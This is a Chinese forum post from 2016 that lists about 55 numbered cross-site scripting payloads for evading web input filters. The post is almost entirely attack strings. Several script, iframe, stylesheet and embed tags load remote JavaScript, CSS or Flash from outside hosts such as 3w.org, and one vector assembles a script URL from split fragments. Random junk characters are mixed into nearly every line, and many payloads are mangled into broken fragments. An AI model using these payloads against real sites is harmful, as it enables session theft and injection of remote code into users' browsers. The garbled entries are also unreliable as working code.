(1)普通的XSS JavaScript注入/ F1 N# S* x I t8 R$ D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 l. I* v1 f* n% U(99)另类弹框
, ~5 m, h- N+ W* a<q/oncut=alert()>1
( M/ B6 H% \& G<s/onclick=alert()>b1 V6 T+ B) [7 ]8 m
<XSS=" onclick="alert(1)//">clickme</SSX=">2 s L. z# F0 F- e
<zzz onclick=alert`1`>clickme</zzz>
; Y, V0 u$ g# p; I <a onclick=alert`1`>clickme</a>
/ s: h5 l) d# d% S<a=">clickme</a=">
" F' O' n- z* s) g- H<a=">clickme</a>
& o9 a: W M5 Z8 X3 B" C$ w) g6 R6 Z<z=">clickme</z=">
6 O! S R$ t% _5 ]<z onclick=alert`1`>clickme</z>; S2 N: l& Z a: s- ]5 ^) d: ]
/ F; f, ^0 ^+ A, l6 v' s
(2)IMG标签XSS使用JavaScript命令) {5 Y& ^( W3 W+ ~3 O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: }1 L' i8 y1 \( @; \% j
) z V6 h. m5 g5 J(3)IMG标签无分号无引号
- l2 i, y2 ^ o2 D<IMG SRC=javascript:alert(‘XSS’)>
: o9 z( f! s/ S) Z: E0 ~
0 p0 h' x! |/ ~; g(4)IMG标签大小写不敏感
/ |# `6 P. Y7 c, W* \1 s<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ f$ V. T. d/ T' P8 W1 ]
) i! T) Q# ^! p x" I9 i$ K(5)HTML编码(必须有分号)
4 A' S) g4 p: z! o, Q<IMG SRC=javascript:alert(“XSS”)>3 r; @9 B; A8 j" B7 ~- ^
& c4 m# W: O# Q! h+ e8 w) q+ a6 |(6)修正缺陷IMG标签
* _. k4 q) |) @<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
) y! M& S3 N+ a W" W$ T( S9 s1 ]- y: M$ ^
(7)formCharCode标签(计算器)8 x. L8 `7 }0 M& {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, k7 a1 B, ]5 H5 u. p( {3 q% A$ D; H+ L& M q; v( M
(8)UTF-8的Unicode编码(计算器)" o* E) I& [6 m4 \
<IMG SRC=jav..省略..S')>2 Z3 x0 @4 @7 k' E, D7 L
0 N5 p6 r4 O( g P- s# O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 ~7 M* A* f2 D
<IMG SRC=jav..省略..S')>( ]# [* x) S1 s7 @8 n7 F
5 Q+ M& G J. d" k, k1 R) v(10)十六进制编码也是没有分号(计算器)
0 |) }# b( L& e<IMG SRC=\'#\'" /span>
E9 o. K' Q' v5 r. `3 W
% [7 o& `# |/ P5 x(11)嵌入式标签,将Javascript分开
" }8 k" }7 j" W<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>6 I' r ^, v3 r' a- \
+ k& Z( i, V% u7 E9 @, R(12)嵌入式编码标签,将Javascript分开
, x0 t0 |6 s8 E* l- n4 p0 g/ c1 L<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 M4 o7 h. a Q. N
! u9 h) d/ ^3 I2 g4 U) \' h
(13)嵌入式换行符
4 ]. Y# K3 P$ c Z F: ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* l* W/ p5 d2 {
6 B& w( B7 e1 q: A(14)嵌入式回车8 a8 K8 _0 ~, |5 H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”># ^6 c/ h, B y1 u8 P
! D/ \2 o# T- {+ U9 G3 p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子) w4 t. d# S c9 y4 X
<IMG SRC=\'#\'" /span>
+ Q4 W# ]8 H) p4 |0 D. z3 h2 L' `0 Z3 `% V0 `- t1 m3 n
(16)解决限制字符(要求同页面)
) C7 W9 \: r( q. L! t6 C" _! f<script>z=’document.’</script>; K" V& q! L4 V" |0 o
<script>z=z+’write(“‘</script># D7 x. i! @3 s$ q6 x7 w$ Q( j
<script>z=z+’<script’</script>. b! j* e3 S2 D) W" n d
<script>z=z+’ src=ht’</script>
4 j0 B- {6 H3 a% H5 G<script>z=z+’tp://ww’</script>
9 ~5 \; L3 h0 F" s<script>z=z+’w.shell’</script>
' @2 `: d5 g. j/ s<script>z=z+’.net/1.’</script>
5 p% z: N# f, a: l" Q<script>z=z+’js></sc’</script>$ S7 j* `' l) @' j5 p* \/ c: o9 Z/ W6 M
<script>z=z+’ript>”)’</script>2 u" r: N( j! V1 b+ Z1 @/ t
<script>eval_r(z)</script>( k: u% r- K% K' Z: e! A
+ ~7 }+ Q' i) C; { x! P(17)空字符
" P" l; h# ?5 d$ Q9 |perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- x( Y+ d% }: P7 D6 I
* ^' H5 a; N y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
! K- R8 v$ m0 i, uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: }! P& x0 v1 Y
+ t( _+ x( ?; B& D+ L3 W7 I(19)Spaces和meta前的IMG标签8 ~! Q3 [! |+ b2 o0 m
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>% a; }' Z. m0 j% F$ a* |! o- a3 f
5 C% U. V! M; |8 u- G
(20)Non-alpha-non-digit XSS
8 Y9 g5 I6 O/ q<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
( l5 c5 h' F% a V1 T
% S% V( I! }1 E7 ^4 N(21)Non-alpha-non-digit XSS to 28 a; O, z! t0 Y) M
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 K) U' V% @) k2 o
. a1 }5 Y8 J) `
(22)Non-alpha-non-digit XSS to 33 ?+ j8 E! W/ e
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
& n6 P2 q; N7 c7 |1 ]
' ?, w) _+ Y0 O. f, {2 n( ]2 z6 z(23)双开括号
! t0 `1 I, h* L<<SCRIPT>alert(“XSS”);//<</SCRIPT>& I( g. [0 |: b4 c2 c% u N9 w
! F+ ?$ @* \ @' {/ H' x(24)无结束脚本标记(仅火狐等浏览器)
0 [+ E- N+ R( }0 u" z. z<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- n/ e* p$ i+ I( C
/ R& G! A+ ]. k- [" P* n9 D(25)无结束脚本标记2
5 ^4 ^/ k7 a" i<SCRIPT SRC=//3w.org/XSS/xss.js>
9 E! j! M, t. k: X4 I" ~
7 j D0 m/ u9 \+ G0 L/ u J(26)半开的HTML/JavaScript XSS: O8 k2 X/ u7 N0 Q1 M. a# H# z
<IMG SRC=\'#\'" /span>. x+ {+ ]1 T. `* H4 a% ~' b2 _
1 l5 |- c/ A' j) L6 g- i' K" q
(27)双开角括号) C( N( N! O2 V( G5 Z
<iframe src=http://3w.org/XSS.html <6 E7 y+ J* I! }4 C: z
[ r4 Y h. e
(28)无单引号 双引号 分号( K. Q- C: ?9 |/ _9 m7 _
<SCRIPT>a=/XSS/6 _' y2 m; C9 E) ?. k
alert(a.source)</SCRIPT>9 M: D5 O$ B# I
# r' ]; l& u$ S(29)换码过滤的JavaScript
, t2 ~- \8 V2 y4 F# @\”;alert(‘XSS’);//
: i1 P: t9 K7 B1 R, Y
9 y1 g% Z& i" m) l. v! D(30)结束Title标签
: B$ k4 D9 ]/ F+ V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( R' K' g( ?- N8 B. U
5 V; n! s6 i% g) h0 i$ E2 }(31)Input Image' o, {0 s* C9 x& u. N
<INPUT SRC=\'#\'" /span>
' a) k5 S, z2 ~: [. f" m _5 }- @; h& r
(32)BODY Image1 ~ a ]; N) t P, k& C6 t
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 x% d3 S9 H% j& q6 C; `9 s) h r3 ^& C% q4 T
(33)BODY标签
) b/ ~: ?0 V, \( K$ o. E<BODY(‘XSS’)>5 Q0 n$ I+ V! |! Q5 F7 P: q
9 I+ X- z+ [: C* s* n% B5 B9 Z3 e(34)IMG Dynsrc
+ x- X3 i5 i& f) X1 ]<IMG DYNSRC=\'#\'" /span>
0 G) ^; K, T1 l: V
& I8 V% ?! e2 O(35)IMG Lowsrc
0 }# _1 n6 M; @ T/ P; l; u1 y<IMG LOWSRC=\'#\'" /span>8 c7 L( p, I5 r; g, w
' L z0 {6 ^5 v) Z6 }$ q(36)BGSOUND
& T$ I4 W" Y( n1 D5 m<BGSOUND SRC=\'#\'" /span># H& t# @$ S S0 o
' }% W T2 k. P( G1 [7 o. x- b
(37)STYLE sheet
7 A/ F( H8 c- a8 W* `: b<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 o t: j0 Y+ O4 w1 T- z/ b {1 |
8 S7 y* k! ^2 H' p- r1 d
(38)远程样式表' Z5 N. f" B2 P m6 G# y1 o' L
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
" y: \4 H( R6 S, g+ R
1 [: G# g+ y! V l" t* A(39)List-style-image(列表式)3 A6 y8 z# L1 a9 D% v
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- [: P9 n- A+ m; w) Z+ l
7 v: E. J( i2 B C: X7 P0 a, C(40)IMG VBscript
3 U3 @( A7 e& a }<IMG SRC=\'#\'" /STYLE><UL><LI>XSS( p( E$ M) a" F; r/ a) Z
! a+ V. I" f/ F! F Q# x(41)META链接url% C+ r! h& } M& j
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 P5 T5 t! A }7 A1 Z* W
% Q( o/ o4 R1 D: {' @- j(42)Iframe
: J$ [+ n! q% q; r o9 i1 _- Z3 F6 i( W<IFRAME SRC=\'#\'" /IFRAME>; s: H' D9 C1 D
* v4 c# R8 D0 w0 T: T9 D0 ^
(43)Frame$ U( J6 e- J' b7 g* \: |
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
' k3 ^: P7 V* o" ?
R0 o6 `# n0 _* [8 W(44)Table U% L; e2 `6 G/ k8 r0 T3 ?" l1 ?
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ f2 k+ e' s- x) c' p3 o
0 D, ?: C% G6 Q) s9 x# M
(45)TD
7 [( Y! f% Q8 [ E2 V1 ~<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 P6 [$ W* J3 g* [; ^8 t4 i6 ]4 Z
, D0 _% f/ M c" o(46)DIV background-image9 G8 V- y% J0 Q: ^, V
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, E3 }' [3 ^ [3 ]# ?% _9 M$ n" {! i: @/ o& L. @. Q4 Z6 p
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279): X* L0 r3 K+ }, D# ~1 }- ^
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
6 `! p5 a6 |4 [/ y% j z- D# @$ `$ e0 N* O& I6 E
(48)DIV expression1 C' C* J6 { y& L/ g5 x
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: I2 W. F T+ W* F0 n; W
' V1 e6 E/ y/ v$ A: o6 V(49)STYLE属性分拆表达
/ Q/ ^7 x% k, D* u6 a<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. q/ L+ S, F" U X6 n
$ b8 m% |4 m2 d(50)匿名STYLE(组成:开角号和一个字母开头)
$ i' t' P# {' G: I+ S8 j! E<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ v$ {7 b c" {$ r& |0 E. j7 k4 p+ l! m7 x, q* A
(51)STYLE background-image
6 K# b" b2 a. i4 c% Z q; d; Y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" {- P3 I Z2 r
% I8 g) |- {! g; W, S' x' u0 `(52)IMG STYLE方式
/ u% v9 ?$ z$ N5 K w8 U: _3 s& Gexppression(alert(“XSS”))’>
1 }- [, F1 V J% _. t
3 h1 [1 T1 Z5 j* \; Y( [7 ](53)STYLE background. {" \( l7 K; ?, U/ ?% I/ J) p' U
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 c+ I# m( J6 X+ Y K+ I! W, I
6 F2 A @5 M9 l; R+ `; y5 f& ~! k(54)BASE/ i! N( i1 ]* }+ a& G4 j4 c
<BASE HREF=”javascript:alert(‘XSS’);//”>
! Z& c6 e6 C" m! j5 L3 A. C, U, E2 O
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, F6 F! h5 X n9 w) ?7 e% x<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>0 M; T0 Z( V" q- i, A* r
|
发表于 2016-4-28 10:06:15
收藏
支持
反对